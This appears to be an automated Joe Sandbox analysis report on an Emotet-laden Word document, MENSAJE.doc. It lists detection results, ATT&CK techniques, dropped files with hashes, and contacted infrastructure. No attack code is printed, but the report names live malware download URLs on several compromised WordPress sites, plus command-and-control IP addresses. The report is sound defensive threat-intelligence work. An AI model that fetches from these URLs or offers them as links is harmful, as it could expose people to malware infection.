Replication Through Removable Media	Launchd	Rc.common	Rc.common	Scripting32	Cached Domain Credentials	System Information Discovery15	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Hidden Files and Directories1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Obfuscated Files or Information11	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Rundll321	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
MENSAJE.doc	62%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Liq8l58\Egok7ei\D64O.dll	100%	Joe Sandbox ML
C:\Users\user\Liq8l58\Egok7ei\D64O.dll	46%	Metadefender		Browse
C:\Users\user\Liq8l58\Egok7ei\D64O.dll	79%	ReversingLabs	Win32.Trojan.EmotetCrypt

Unpacked PE Files

Source	Detection	Scanner	Label	Download
11.2.rundll32.exe.200000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
12.2.rundll32.exe.1c0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
14.2.rundll32.exe.1c0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.10000000.3.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
7.2.rundll32.exe.10000000.2.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
9.2.rundll32.exe.1c0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
13.2.rundll32.exe.10000000.2.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
15.2.rundll32.exe.3b0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
10.2.rundll32.exe.6d0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
9.2.rundll32.exe.1a0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
16.2.rundll32.exe.1a0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
13.2.rundll32.exe.1c0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
12.2.rundll32.exe.1e0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
18.2.rundll32.exe.10000000.2.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
10.2.rundll32.exe.10000000.3.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
11.2.rundll32.exe.10000000.2.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.220000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
14.2.rundll32.exe.10000000.3.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
12.2.rundll32.exe.10000000.3.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
16.2.rundll32.exe.10000000.3.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
16.2.rundll32.exe.1c0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
17.2.rundll32.exe.10000000.2.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
14.2.rundll32.exe.1a0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
9.2.rundll32.exe.10000000.2.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
17.2.rundll32.exe.260000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
10.2.rundll32.exe.6b0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
13.2.rundll32.exe.1a0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
7.2.rundll32.exe.2a0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
15.2.rundll32.exe.10000000.2.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
18.2.rundll32.exe.720000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

Source	Detection	Scanner	Label	Link
nadysa.com	5%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://lvnskin.com/h/IB/	12%	Virustotal		Browse
http://lvnskin.com/h/IB/	100%	Avira URL Cloud	malware
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://nadysa.com/wp-content/Almet/	14%	Virustotal		Browse
http://nadysa.com/wp-content/Almet/	100%	Avira URL Cloud	malware
http://crooks-taylor.com/1676470973/1/	13%	Virustotal		Browse
http://crooks-taylor.com/1676470973/1/	100%	Avira URL Cloud	malware
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://rabiei.fun/eidl-reconsideration-bs3lu/feoOiAO/	8%	Virustotal		Browse
http://rabiei.fun/eidl-reconsideration-bs3lu/feoOiAO/	100%	Avira URL Cloud	malware
http://rex.tasmiragroup.com/wp-includes/un6G/	100%	Avira URL Cloud	malware
http://84.232.229.24/v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://whitetheme.xyz/wp-content/q8H/	100%	Avira URL Cloud	malware
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://boomarketer.com/wp-content/6/	100%	Avira URL Cloud	malware
http://nadysa.com	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nadysa.com	217.144.106.11	true	true	5%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://nadysa.com/wp-content/Almet/	true	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://84.232.229.24/v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000006.00000002.2098558453.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097747134.0000000000B37000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109132236.0000000000A97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2121227769.00000000023D7000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	rundll32.exe, 0000000A.00000002.2129931457.0000000000870000.00000002.00000001.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	powershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://investor.msn.com	rundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	rundll32.exe, 00000006.00000002.2098558453.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097747134.0000000000B37000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109132236.0000000000A97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2121227769.00000000023D7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000005.00000002.2088948505.0000000002330000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109674521.0000000002820000.00000002.00000001.sdmp	false		high
http://lvnskin.com/h/IB/	powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ocsp.sectigo.com0	powershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crooks-taylor.com/1676470973/1/	powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmp	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	powershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://investor.msn.com/	rundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmp	false		high
http://rabiei.fun/eidl-reconsideration-bs3lu/feoOiAO/	powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmp	true	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://rex.tasmiragroup.com/wp-includes/un6G/	powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://sectigo.com/CPS0D	powershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://whitetheme.xyz/wp-content/q8H/	powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://www.%s.comPA	powershell.exe, 00000005.00000002.2088948505.0000000002330000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109674521.0000000002820000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000006.00000002.2098558453.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097747134.0000000000B37000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109132236.0000000000A97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2121227769.00000000023D7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2129931457.0000000000870000.00000002.00000001.sdmp	false		high
http://boomarketer.com/wp-content/6/	powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://nadysa.com	powershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
217.144.106.11	unknown	Iran (ISLAMIC Republic Of)		204213	NETMIHANIR	true
84.232.229.24	unknown	Romania		8708	RCS-RDS73-75DrStaicoviciRO	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	343668
Start date:	25.01.2021
Start time:	11:19:52
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	MENSAJE.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDOC@32/8@1/2
EGA Information:	Successful, ratio: 92.3%
HDC Information:	Successful, ratio: 33.6% (good quality ratio 24.1%) Quality average: 58.5% Quality standard deviation: 37.9%
HCA Information:	Successful, ratio: 86% Number of executed functions: 34 Number of non-executed functions: 80
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Execution Graph export aborted for target powershell.exe, PID 2308 because it is empty Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:20:36	API Interceptor	1x Sleep call for process: msg.exe modified
11:20:36	API Interceptor	36x Sleep call for process: powershell.exe modified
11:20:50	API Interceptor	426x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
217.144.106.11	5390080_2021_1-259043.doc	Get hash	malicious	Browse	originpart.com/wp-content/acStl/
	5390080_2021_1-259043.doc	Get hash	malicious	Browse	originpart.com/wp-content/acStl/
	MENSAJE.doc	Get hash	malicious	Browse	nadysa.com/wp-content/Almet/
	info.doc	Get hash	malicious	Browse	originpart.com/wp-content/acStl/
84.232.229.24	MENSAJE.doc	Get hash	malicious	Browse	84.232.229.24/40hbu1ld1mxg/gbxh6m/w00gy5ya8o03k/
	MES-2021_01_22-3943960.doc	Get hash	malicious	Browse	84.232.229.24/yy5pra4h/
	Documento 2201 01279.doc	Get hash	malicious	Browse	84.232.229.24/6zji6l/
	DATI 2021.doc	Get hash	malicious	Browse	84.232.229.24/hu5n7nnlfn8qzz44/4teiln75sss0k/j8fl359hk405/rlm4iik5i1da/3l3lpmieamhaykhkk/
	informazioni 536-32772764.doc	Get hash	malicious	Browse	84.232.229.24/o6p3ixr1vo/0nwr6v/oxpej1lly6ntbn4xn2/x9kd6qn1qdqyq/d0lxoj4a8vrn/
	Meddelelse-58931636.doc	Get hash	malicious	Browse	84.232.229.24/m4mfruuzgu2ajo8qu7t/bl7ktqi5zlffcg/x8ofu4so7/loe8ts1l0p5/nzne9gz6/76ki44u754xsh/
	doc_2201_3608432.doc	Get hash	malicious	Browse	84.232.229.24/jcmzbwn9r7yck/wlh8myw/
	13-2021.doc	Get hash	malicious	Browse	84.232.229.24/g4fo4/gsc17oaf9ynv0wo/670mqqf8vrds/5wmsg3x72r/mh2sm8tbg/2jp5a8m51xtysk3vljn/
	MAIL-224201 277769577.doc	Get hash	malicious	Browse	84.232.229.24/nef4co7lnfc9omq/gcs3bqsea9h/by1c/ujdlxj02m6twsi0q/5qqr6ck1fl34uz4g8l/tck4x5pqu8pykii6lbl/

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
RCS-RDS73-75DrStaicoviciRO	MENSAJE.doc	Get hash	malicious	Browse	84.232.229.24
	MES-2021_01_22-3943960.doc	Get hash	malicious	Browse	84.232.229.24
	Documento 2201 01279.doc	Get hash	malicious	Browse	84.232.229.24
	DATI 2021.doc	Get hash	malicious	Browse	84.232.229.24
	informazioni 536-32772764.doc	Get hash	malicious	Browse	84.232.229.24
	Meddelelse-58931636.doc	Get hash	malicious	Browse	84.232.229.24
	doc_2201_3608432.doc	Get hash	malicious	Browse	84.232.229.24
	13-2021.doc	Get hash	malicious	Browse	84.232.229.24
	MAIL-224201 277769577.doc	Get hash	malicious	Browse	84.232.229.24
	Arch_05_222-3139.doc	Get hash	malicious	Browse	5.2.136.90
	MENSAJE 2021.doc	Get hash	malicious	Browse	5.2.136.90
	Documento_0501_012021.doc	Get hash	malicious	Browse	5.2.136.90
	Datos_019_9251.doc	Get hash	malicious	Browse	5.2.136.90
	document_84237-299265042.doc	Get hash	malicious	Browse	5.2.136.90
	ARCH-012021-21-1934.doc	Get hash	malicious	Browse	5.2.136.90
	Mensaje K-158701.doc	Get hash	malicious	Browse	5.2.136.90
	Datos-2021-4-377562.doc	Get hash	malicious	Browse	5.2.136.90
	INFO.doc	Get hash	malicious	Browse	5.2.136.90
	MAIL-0573188.doc	Get hash	malicious	Browse	5.2.136.90
	Bestand.doc	Get hash	malicious	Browse	5.2.136.90
NETMIHANIR	5390080_2021_1-259043.doc	Get hash	malicious	Browse	217.144.106.11
	5390080_2021_1-259043.doc	Get hash	malicious	Browse	217.144.106.11
	MENSAJE.doc	Get hash	malicious	Browse	217.144.106.11
	info.doc	Get hash	malicious	Browse	217.144.106.11
	SecuriteInfo.com.Trojan.PackedNET.507.9142.exe	Get hash	malicious	Browse	89.32.249.155
	RFQSDCL1005C1N5STDFM01.doc	Get hash	malicious	Browse	89.32.249.155
	dhl.exe	Get hash	malicious	Browse	89.39.208.218
	http://emiliaclarki.com/graphing-lab-ifr8w/microsoft-365-keeps-prompting-for-password.html	Get hash	malicious	Browse	89.32.250.20
	http://negahprinting.ir/fitness-write-505ei/usnorthcom.html	Get hash	malicious	Browse	89.42.209.236
	Payment Advice.xlsx	Get hash	malicious	Browse	89.39.208.139
	7H5vz7YpcM.doc	Get hash	malicious	Browse	217.144.104.55
	XUgRg2eJRT.doc	Get hash	malicious	Browse	217.144.104.55
	g9LflPVB7a.doc	Get hash	malicious	Browse	217.144.104.55
	afqAtl5Onl.doc	Get hash	malicious	Browse	217.144.104.55
	HlBgjf93UN.doc	Get hash	malicious	Browse	217.144.104.55
	knUTWH2JBb.doc	Get hash	malicious	Browse	217.144.104.55
	19gxoguxLl.doc	Get hash	malicious	Browse	217.144.104.55
	VTjuj7r7yz.doc	Get hash	malicious	Browse	217.144.104.55
	dsgl1yi7Ij.doc	Get hash	malicious	Browse	217.144.104.55
	YCSp7PiD4m.doc	Get hash	malicious	Browse	217.144.104.55

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4380F3E0-FFD8-4816-B513-C2DC6937B540}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4A859C42-B329-43DD-B686-F01B0F0382FA}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3573187972516119
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbD:IiiiiiiiiifdLloZQc8++lsJe1MzE
MD5:	7B7B0FAAC058615FA256F298EF50E033
SHA1:	532BC89D18E5E4E80A09AF2EE2F1849F0D313BA3
SHA-256:	BF975FC2572A6799BFB7B382A5B60FC5925092E90C23992635E7A4A80E23468C
SHA-512:	E1ED55DD9A3C5D3B36D3762DE0DD0E29CF2C1B29BEB84A99158397C6FE7D140F4B542D507016A97F75726102E8929AE64DFEF1233C56258B9FB27FF77B2A4A5C
Malicious:	false
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\MENSAJE.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Mon Jan 25 18:20:32 2021, length=171008, window=hide
Category:	dropped
Size (bytes):	1994
Entropy (8bit):	4.527931653903523
Encrypted:	false
SSDEEP:	24:8xSZ4m/XTr6N4U8lQieyDv3qa+dM7dD2xSZ4m/XTr6N4U8lQieyDv3qa+dM7dV:82/XT+NnIQimPQh22/XT+NnIQimPQ/
MD5:	ED526E0371646C21736FC4B49050A11D
SHA1:	F4404635521C1880F87EDAB9050515639F75C7AF
SHA-256:	14D12A370FCFDF33A2B1729D6410191DF8033C8640D1B49B703117D69323E36F
SHA-512:	6654BF24BF6CEB9BD6619C43E8B89C5AB2239D6E74BE831D765E43F5010B031F727342BA673D142D611B32624A8552507A6743162AA323448370010DD6AF16C8
Malicious:	false
Preview:	L..................F.... ...y.=..{..y.=..{...B.&O................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....^.2.....9R.. .MENSAJE.doc.D.......Q.y.Q.y...8.....................M.E.N.S.A.J.E...d.o.c.......u...............-...8...[............?J......C:\Users\..#...................\\760639\Users.user\Desktop\MENSAJE.doc.".....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.M.E.N.S.A.J.E...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......760639..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	59
Entropy (8bit):	4.0685274819550825
Encrypted:	false
SSDEEP:	3:M19rcowFomX19rcov:MMxay
MD5:	9BE8489A077CDD735AB03D3C19C939E9
SHA1:	66A47FB266D52AED31E065408D1159EEC08BC3AA
SHA-256:	84FE6C43E64A4EE18EC57F48077808C47AEB632452750B6A1B98920AC7931040
SHA-512:	D8D933961AC4D7591D0AC7A20066EFCEADD3F122E05CC733F786A21FB0ECB935A8965D26445077197C7C4B26F16C0E3F491636E51606ABE52AFF3BBE4AC620CE
Malicious:	false
Preview:	[doc]..MENSAJE.LNK=0..MENSAJE.LNK=0..[doc]..MENSAJE.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7PDJ5QC81VWL5221GXZU.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.586698549442453
Encrypted:	false
SSDEEP:	96:chQCsMqftMqvsqvJCwo5z8hQCsMqftMqvsEHyqvJCworvz1PYftJHyf8Iht+lUVJ:cy3o5z8y7Hnorvz1bf8IVIu
MD5:	938EBE9D3E192FE703709754C8C13AD3
SHA1:	669D15EA186E5265982DBD1740A8D161AE519FD9
SHA-256:	F6DD8092D12C97BAABC1BCA05BCB811463295A013A2E756C1DFD85609E3E6536
SHA-512:	AA7EE59E375EF40A960C8F195CDA18299C9E83412EAEF1C2C034449E6696AEEE8EE4C249CD90E5784BCB94DAB54EC6DCD7F023076B3CA3381727ABA373FB27AA
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\~$ENSAJE.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
